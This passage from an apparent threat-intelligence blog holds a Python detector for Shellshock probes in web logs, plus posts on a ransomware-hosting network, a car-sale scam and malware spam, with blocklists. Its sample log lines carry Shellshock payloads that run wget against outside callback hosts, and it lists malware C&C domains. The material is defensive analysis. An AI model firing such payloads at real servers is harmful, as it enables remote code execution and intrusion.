route:          83.166.234.0/24
descr:          S.R.L. MangoHost Network
origin:         AS200019
mnt-by:         RIM2000-MNT
changed:        lukina@rim2000.ru 20140319
source:         RIPE
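
The check described at the start of this post, as an added example (not code from the original post): it finds Shellshock probes in an Apache log that has a leading vhost column, extracts the callback host, and flags the /24 when the probing IP and the callback host share it. The second and third log lines are constructed, and the `RESOLVED` mapping is an assumed stand-in for a DNS or passive DNS lookup, filled with the address the post gives for ad.dipad.biz.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit

# Quoted log fields may contain backslash-escaped quotes (\"), so the
# pattern consumes escape pairs instead of stopping at the first quote.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'^(\S+) (\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED +
    r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED + '$'
)
FIELDS = ("request", "referer", "agent")  # regex groups 3, 4 and 5

# Bash treats an environment value beginning "() {" as a function
# definition; CGI copies request headers into the environment.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
URL_RE = re.compile(r"""https?://[^\s"'\\]+""")

# First line is the one quoted in the post; the other two are constructed.
SAMPLE_LOG = r'''
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""
dynamoo.com:80 198.51.100.20 - - [27/Sep/2014:03:09:02 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"
dynamoo.com:80 203.0.113.7 - - [27/Sep/2014:03:11:45 +0100] "GET /cgi-bin/status HTTP/1.1" 404 310 "() { :;}; wget -q -O /dev/null http://callback.example/t" "-"
'''.strip().splitlines()

# Assumed lookup result; the post states ad.dipad.biz is on 83.166.234.186.
RESOLVED = {"ad.dipad.biz": "83.166.234.186"}


def find_shellshock_probes(lines):
    """Return one record per log field carrying the function-definition prefix."""
    probes = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        vhost, client = m.group(1), m.group(2)
        for name, value in zip(FIELDS, m.groups()[2:]):
            if SHELLSHOCK_RE.search(value):
                hosts = {urlsplit(u).hostname for u in URL_RE.findall(value)}
                probes.append({
                    "client": client,
                    "vhost": vhost,
                    "field": name,
                    "callbacks": sorted(h for h in hosts if h),
                })
    return probes


def suspicious_networks(probes, resolved, prefix=24):
    """Networks where the prober and its callback host sit side by side."""
    nets = set()
    for probe in probes:
        net = ip_network(f"{probe['client']}/{prefix}", strict=False)
        for host in probe["callbacks"]:
            ip = resolved.get(host)
            if ip and ip_address(ip) in net:
                nets.add(str(net))
    return sorted(nets)


if __name__ == "__main__":
    found = find_shellshock_probes(SAMPLE_LOG)
    for probe in found:
        print(probe)
    print(suspicious_networks(found, RESOLVED))
```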


MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau.

Until the past few days, MangoHost was hosting the ransomware sites listed here [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode.com, whatever that may be (you can guarantee it is nothing good).

Currently hosted domains include a collection of fake browser plugins, some malvertising sites, some porn, spam sites, hacker resources, ransomware domains and what might appear to be some fake Russian law firms. A list of everything that I can currently see in this /24 is:


I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it.

Friday 29 August 2014

cars4cashuk.com scam and Cyber Cast International (CCIHosting), Panama [190.97.160.0/21]

I spotted this scam warning on the Autotrader website:
We have received reports of customers receiving a text message asking them to visit www.cars4cashuk.com to sell their cars quickly for cash. Customers are asked to pay a deposit in order to secure the sale of their vehicle. This website is not genuine and in no way affiliated with AutoTrader. We are currently working to have this website shut down.

For more information please contact our Customer Security team on 0330 303 9001.

The site is a crude attempt to extract money from unsuspecting people trying to trade their car, but it does feature the AutoTrader logo prominently.


If you're trying to sell your car then probably all you need to know is that it's a scam, and you probably don't need to read any further. But if you read my blog regularly then you might want to read on..

The site has no ownership information, but a check of the WHOIS details shows the following contacts:

Domain Name: CARS4CASHUK.COM
Registry Domain ID:
Registrar WHOIS Server: whois.1api.net
Registrar URL: http://www.1api.net
Updated Date: 2014-08-10T15:31:12Z
Creation Date: 2014-08-10T15:31:12Z
Registrar Registration Expiration Date: 2015-08-10T15:31:12Z
Registrar: 1API GmbH
Registrar IANA ID: 1387
Registrar Abuse Contact Email: abuse@1api.net
Registrar Abuse Contact Phone: +49.68416984x200
Reseller: www.sky-ip.com http://www.sky-ip.com/
Domain Status: ok - http://www.icann.org/epp#OK
Registry Registrant ID:
Registrant Name: José Castrellón
Registrant Organization: CyberCast
Registrant Street: Ricardo J. Alfaro, El Dorado
Registrant City: Panama
Registrant State/Province: Panama
Registrant Postal Code: 0819-06448
Registrant Country: PA
Registrant Phone: +507.3014841
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: domains@sky-ip.com
Registry Admin ID:
Admin Name: José Castrellón
Admin Organization: CyberCast
Admin Street: Ricardo J. Alfaro, El Dorado
Admin City: Panama
Admin State/Province: Panama
Admin Postal Code: 0819-06448
Admin Country: PA
Admin Phone: +507.3014841
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: domains@sky-ip.com
Registry Tech ID:
Tech Name: José Castrellón
Tech Organization: CyberCast
Tech Street: Ricardo J. Alfaro, El Dorado
Tech City: Panama
Tech State/Province: Panama
Tech Postal Code: 0819-06448
Tech Country: PA
Tech Phone: +507.3014841
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: domains@sky-ip.com
Name Server: ns1.cybercastco.com
Name Server: ns2.cybercastco.com


So who are José Castrellón and CyberCast (aka CyberCast International)? Are they the scammers? Well, no.. CyberCast (through their website at ccihosting.com) offer anonymous offshore hosting and domain registrations, the sort of things that scammers love, although of course there are legitimate uses for such things. CyberCast presumably are not doing the actual scamming, but I'd suggest that they could be accused of some level of complicity.


So.. you can buy a domain and web hosting using an anonymous payment system like Bitcoin or Perfect Money and, it seems, more or less do what you like with it. Now, that's great if you are running a web site dedicated to overthrowing an oppressive regime (for example) but the bulk of the sites hosted by CyberCast are a lot less savoury, including phishing sites, sites selling DDOS services, counterfeit goods, trading stolen credit card information, piracy sites, spam, cybersquatting, illegal or fake pharmacies, hacking sites and a little bit of porn as well.

There may well be some legitimate sites hosted by this company, I spotted some local Panamanian sites for example, but the overwhelming majority of the CyberCast / CCIHosting address space is completely toxic, therefore I would strongly recommend that you block access to the 190.97.160.0/21 range from your network.

There is not a lot of reputation data for the sites in this /21, but I have compiled a list of sites, IPs, WOT ratings and Google and SURBL prognoses here [csv].

Saturday 26 July 2014

"PLEASE SEND PI" spam / something evil on 198.27.110.192/26

"PI" in this case seems to refer to a Proforma Invoice rather than Π - but in fact the attachment is malware.

Date:      Fri, 25 Jul 2014 22:50:14 -0700 [01:50:14 EDT]
From:      OLINMETALS TRADING CO
Subject:      PLEASE SEND PI

Greetings,

Regarding our previous conversation about our urgent purchase, kindly
find attached PI and let us know if the quantity can fit in 40ft
container.
kindly revise the Proforma invoice so that we can proceed with an
advance payment as agreed.


We look forward to your urgent response with revised proforma invoice.


Thks & Rgds,
OLINMETALS TRADING CO., LTD
Tel : 0097143205171
Fax : 0097143377150 

It sounds like a fiendish maths question from an obscure exam. How much Π can you fit in a 40ft container? Anyway, the attachment Order.zip contains a malicious executable klopppp890.exe which has a VirusTotal detection rate of 18/53. The ThreatExpert report [pdf] and ThreatTrack report [pdf] show that the malware phones home to walex2.ddob.us/sddob/gate.php on 198.27.110.200 (OVH Canada reassigned to Big Kesh, LLC, US).

Looking at the domains registered on 198.27.110.200 and the surrounding IPs there do seem to be a lot of malicious ones being used as malware C&Cs:


frank.ddob.us 198.27.110.196
walex.ddob.us 198.27.110.196 [1]
dino.ddob.us 198.27.110.197 [2] [3]
mrson.ddob.us 198.27.110.200
walex2.ddob.us 198.27.110.200 [4]
robert.xiga.us 198.27.110.200 [5]
daniel.ddob.us 198.27.110.201 [6]
robert.ddob.us 198.27.110.201 [7]
326.xiga.us 198.27.110.203
frannky.ddob.us 198.27.110.210 [9]
janet.ddob.us 198.27.110.211
sayee.ddob.us 198.27.110.211 [10]
dino.ddob.us 198.27.110.213 [11] [12]
biolo.xiga.us 198.27.110.216

I think this is enough evidence to block the entire 198.27.110.192/26 as a precaution (although there do appear to be a small number of legitimate sites too). For the record, this is suballocated to:

NetRange:       198.27.110.192 - 198.27.110.255
CIDR:           198.27.110.192/26
OriginAS:       AS16276
NetName:        OVH-CUST-445017
NetHandle:      NET-198-27-110-192-1
Parent:         NET-198-27-64-0-1
NetType:        Reassigned
RegDate:        2014-03-07
Updated:        2014-03-07
Ref:            http://whois.arin.net/rest/net/NET-198-27-110-192-1

CustName:       Big Kesh, LLC
Address:        1077 Jearsey ln ne
City:           Palm Bay
StateProv:      FL
PostalCode:     32905
Country:        US
RegDate:        2014-03-07
Updated:        2014-03-07
Ref:            http://whois.arin.net/rest/customer/C04889220


In the case of Big Kesh LLC I will be charitable and assume that this behaviour is happening without their consent.

The domains xiga.us and ddob.us appear to be used for purely malicious purposes, so I recommend that you block them. The registrant details are probably fake but here they are:

xiga.us
Registrant ID:                               06BFAFB5641FA567
Registrant Name:                             Xieng Hyua
Registrant Address1:                         Red Bulevard
Registrant City:                             North Bergen
Registrant State/Province:                   NJ
Registrant Postal Code:                      07047
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.6874598745
Registrant Email:                            xiga@fbi.al
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C11


ddob.us
Registrant ID:                               0121C76442E2ED55
Registrant Name:                             Jackson Togan
Registrant Address1:                         Zhongzeng District 100
Registrant City:                             Zhongzeng District
Registrant State/Province:                   Zhongzeng District
Registrant Postal Code:                      100
Registrant Country:                          TAIWAN, PROVINCE OF CHINA
Registrant Country Code:                     TW
Registrant Phone Number:                     +92.68974568
Registrant Email:                            jackson.togan@yahoo.com
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C11


Recommended blocklist:
198.27.110.192/26
xiga.us
ddob.us